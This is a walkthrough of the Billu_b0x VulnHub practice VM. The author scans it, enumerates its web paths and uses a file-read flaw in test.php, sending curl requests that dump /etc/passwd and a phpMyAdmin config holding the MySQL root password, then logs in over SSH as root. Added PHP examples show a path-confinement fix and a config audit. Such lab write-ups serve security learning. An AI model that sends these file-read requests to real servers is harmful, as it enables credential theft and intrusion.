30 March 2023

Pentesting Fun Stuff

following the cyber security path…

billu: b0x

Location

https://download.vulnhub.com/billu/Billu_b0x.zip

Introduction

This is the first Boot2Root from Manish Kishan Tanwar, and the official description does not tell much, except that it uses Ubuntu, PHP, MySQL and Apache. This challenge should have medium difficulty with tricks. The goal is to break into the VM through the web application and from there escalate privileges to gain root access.

Getting started

Let’s see what is running on this system.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -sV -sC -T4 -p- 192.168.56.107
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-21 15:03 CEST
Nmap scan report for 192.168.56.107
Host is up (0.00012s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 fa:cf:a2:52:c4:fa:f5:75:a7:e2:bd:60:83:3e:7b:de (DSA)
|   2048 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8 (RSA)
|_  256 0e:5e:33:03:50:c9:1e:b3:e7:51:39:a4:4a:10:64:ca (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: --==[[IndiShell Lab]]==--
MAC Address: 08:00:27:1C:31:B1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds

When browsing to the webserver I get a login page which invites me to do some SQL injection.

After several manual and automated tries I have no luck with the SQLi invitation. Next step is some enumeration.

┌─[n13mant@planetmars]─[~/Documents/Apps/dirsearch]
└──╼ $python3 dirsearch.py -u "http://192.168.56.107" -e php,html -x 403 -r
 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )
Extensions: php, html | Threads: 10 | Wordlist size: 5542
Error Log: /home/n13mant/Documents/Apps/dirsearch/logs/errors-17-05-10_15-15-54.log
Target: http://192.168.56.107
[15:15:54] Starting:
[15:15:58] 200 -  307B  - /add
[15:15:58] 200 -  307B  - /add.php
[15:16:01] 200 -    1B  - /c
[15:16:05] 200 -    3KB - /head.php
[15:16:05] 301 -  317B  - /images  ->  http://192.168.56.107/images/
[15:16:05] 200 -   47KB - /in
[15:16:05] 200 -    3KB - /index
[15:16:05] 200 -    3KB - /index.php
[15:16:09] 302 -    2KB - /panel.php  ->  index.php
[15:16:10] 200 -    8KB - /phpmy/
[15:16:12] 200 -    1B  - /show
[15:16:13] 200 -   72B  - /test.php
[15:16:13] 200 -   72B  - /test
[15:16:14] Starting: phpmy/
[15:16:16] 200 -  227B  - /phpmy/CREDITS
[15:16:16] 200 -   28KB - /phpmy/ChangeLog
[15:16:16] 200 -  128B  - /phpmy/INSTALL
[15:16:16] 200 -    2KB - /phpmy/README
[15:16:17] 200 -  190B  - /phpmy/TODO
[15:16:22] 200 -    0B  - /phpmy/config.inc.php
[15:16:22] 200 -    0B  - /phpmy/config.inc
[15:16:23] 200 -    3KB - /phpmy/docs
[15:16:23] 200 -   18KB - /phpmy/favicon.ico
[15:16:23] 200 -    8KB - /phpmy/export
[15:16:24] 200 -    8KB - /phpmy/import
[15:16:24] 200 -    8KB - /phpmy/import.php
[15:16:24] 200 -    8KB - /phpmy/index
[15:16:24] 200 -    8KB - /phpmy/index.php
[15:16:25] 301 -  319B  - /phpmy/js  ->  http://192.168.56.107/phpmy/js/
[15:16:25] 301 -  326B  - /phpmy/libraries  ->  http://192.168.56.107/phpmy/libraries/
[15:16:26] 200 -    8KB - /phpmy/main.php
[15:16:26] 200 -    8KB - /phpmy/main
[15:16:27] 200 -    8KB - /phpmy/phpinfo
[15:16:27] 200 -    8KB - /phpmy/phpinfo.php
[15:16:27] 200 -   41KB - /phpmy/phpmyadmin
[15:16:27] 200 -    8KB - /phpmy/phpinfo.php
[15:16:28] 200 -    1KB - /phpmy/print
[15:16:28] 200 -   26B  - /phpmy/robots.txt
[15:16:28] 200 -    3KB - /phpmy/scripts/
[15:16:28] 301 -  324B  - /phpmy/scripts  ->  http://192.168.56.107/phpmy/scripts/
[15:16:29] 301 -  322B  - /phpmy/setup  ->  http://192.168.56.107/phpmy/setup/
[15:16:29] 200 -   13KB - /phpmy/setup/
[15:16:30] 200 -    8KB - /phpmy/sql.php
[15:16:30] 200 -    8KB - /phpmy/sql.php
[15:16:30] 200 -    8KB - /phpmy/sql
[15:16:31] 301 -  323B  - /phpmy/themes  ->  http://192.168.56.107/phpmy/themes/
[15:16:32] 200 -    8KB - /phpmy/url
[15:16:32] Starting: phpmy/scripts/
[15:16:49] 200 -    5KB - /phpmy/scripts/upgrade
[15:16:50] Starting: phpmy/setup/
[15:16:59] 303 -    0B  - /phpmy/setup/config
[15:16:59] 303 -    0B  - /phpmy/setup/config.php
[15:16:59] 303 -    0B  - /phpmy/setup/config.php
[15:17:01] 200 -   13KB - /phpmy/setup/index.php
[15:17:01] 200 -   13KB - /phpmy/setup/index
[15:17:02] 301 -  326B  - /phpmy/setup/lib  ->  http://192.168.56.107/phpmy/setup/lib/
[15:17:05] 200 -    5KB - /phpmy/setup/scripts
[15:17:07] 200 -    7KB - /phpmy/setup/styles
Task Completed

Looks like the SQLi invitation was a distraction. Several interesting pages, including a phpMyAdmin page.
First I’ll take a look at add.php. Unfortunately it doesn’t really do anything except waste my time.

Next one on my list is test.php.

It needs a ‘file’ parameter.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $curl -X POST --data "file=/etc/passwd" http://192.168.56.107/test.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
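
The request above shows test.php returning any absolute path passed in the file parameter. As an added example (not the VM's code; the vulnerable handler shape, DOWNLOAD_DIR and resolve_download() are assumptions, and it needs PHP 7.1 or later), this is one way to confine such an endpoint to a single directory by resolving the path first and then comparing it to the allowed base:

```php
<?php
// Added example, not the VM's test.php. Assumed vulnerable shape:
//     readfile($_POST['file']);   // returns any path the web user can read
const DOWNLOAD_DIR = '/var/www/downloads';   // hypothetical servable directory

// Map a client-supplied name to a real file inside $baseDir, or null.
function resolve_download(string $baseDir, $requested): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !is_string($requested) || $requested === ''
        || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() collapses "..", follows symlinks, and fails on missing files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    // Trailing separator so a sibling like /var/www/downloads-old cannot match.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

if (PHP_SAPI === 'cli') {
    // Self-check on a constructed temporary tree.
    $root = sys_get_temp_dir() . '/dl_demo_' . getmypid();
    mkdir("$root/downloads", 0700, true);
    file_put_contents("$root/downloads/manual.pdf", 'ok');
    file_put_contents("$root/secret.inc.php", 'constructed secret');
    $cases = ['manual.pdf' => true, '/etc/passwd' => false,
              '../secret.inc.php' => false, '' => false];
    foreach ($cases as $name => $allowed) {
        $got = resolve_download("$root/downloads", $name) !== null;
        printf("%-22s %s\n", var_export($name, true), $got === $allowed ? 'ok' : 'FAIL');
    }
    unlink("$root/downloads/manual.pdf");
    unlink("$root/secret.inc.php");
    rmdir("$root/downloads");
    rmdir($root);
} else {
    $path = resolve_download(DOWNLOAD_DIR, $_POST['file'] ?? null);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    readfile($path);
}
```

Run from the command line, the script exercises the check against the two kinds of path used in this walkthrough (an absolute path and a path outside the served directory); under a web server it acts as the handler.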

Now for some credentials.

┌─[n13mant@planetmars]─[~/Desktop]
└──╼ $curl -X POST --data "file=/var/www/phpmy/config.inc.php" http://192.168.56.107/test.php
<?php
/* Servers configuration */
$i = 0;
/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
/* End of servers configuration */
$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';
/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';
?>

Wow… that was almost too easy.

┌─[✗]─[n13mant@planetmars]─[~/Desktop]
└──╼ $ssh root@192.168.56.107 -p 22
root@192.168.56.107's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)
 * Documentation:  https://help.ubuntu.com/
  System information as of Wed May 24 19:56:10 IST 2017
  System load:  0.0               Processes:           75
  Usage of /:   11.9% of 9.61GB   Users logged in:     0
  Memory usage: 8%                IP address for eth0: 192.168.56.107
  Swap usage:   0%
  Graph this data and manage this system at:
    https://landscape.canonical.com/
New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2017.
root@indishell:~#

Sweet. But I still have some question marks left. What about those odd pages in the DirSearch scan? What about phpMyAdmin?
It feels like I cheated in gaining the root key.
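
The config.inc.php pulled through test.php stores the MySQL root account even though auth_type is cookie, where phpMyAdmin asks for credentials at login and does not need them in the file. An added example, not phpMyAdmin's or the VM's code, that flags such entries; load_cfg() and audit_servers() are hypothetical helper names and the sample config is constructed:

```php
<?php
// Added example, not part of phpMyAdmin or the VM. The sample config is
// constructed from the settings shown above, with a placeholder password.

// Load $cfg the way phpMyAdmin does: include the file in a local scope.
function load_cfg(string $file): array
{
    $cfg = [];
    include $file;
    return $cfg;
}

function audit_servers(array $cfg): array
{
    $findings = [];
    foreach ($cfg['Servers'] ?? [] as $n => $srv) {
        $auth = $srv['auth_type'] ?? '';
        $user = $srv['user'] ?? '';
        $stored = $user !== '' || ($srv['password'] ?? '') !== '';
        // Cookie and HTTP auth prompt the user; stored credentials are unused.
        if ($stored && in_array($auth, ['cookie', 'http'], true)) {
            $findings[] = "server $n: credentials stored but not needed for '$auth' auth";
        }
        if ($user === 'root') {
            $findings[] = "server $n: MySQL root account named in the config";
        }
        if (!empty($srv['AllowNoPassword'])) {
            $findings[] = "server $n: AllowNoPassword is enabled";
        }
        if ($srv['AllowRoot'] ?? true) {   // phpMyAdmin default is true
            $findings[] = "server $n: AllowRoot not set to false";
        }
    }
    return $findings;
}

$sample = tempnam(sys_get_temp_dir(), 'pma');
file_put_contents($sample, <<<'CFG'
<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'PLACEHOLDER';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
CFG
);
echo implode("\n", audit_servers(load_cfg($sample))), "\n";
unlink($sample);
```

Because load_cfg() includes the file, run it only against configs you would already let phpMyAdmin load.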

Conclusion

This was a fun challenge with some nice features. The final part was over faster than I had anticipated and I think there may be multiple ways to get there. But for now I’m content. Maybe at a later stage I’ll explore other options and update this post.
 
